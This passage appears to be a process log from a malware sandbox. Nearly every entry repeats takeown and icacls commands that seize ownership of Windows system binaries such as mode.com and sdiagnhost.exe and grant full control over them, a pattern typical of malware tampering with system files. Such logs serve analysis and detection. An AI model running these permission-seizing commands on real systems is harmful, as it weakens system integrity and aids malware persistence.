"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdiagnhost.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

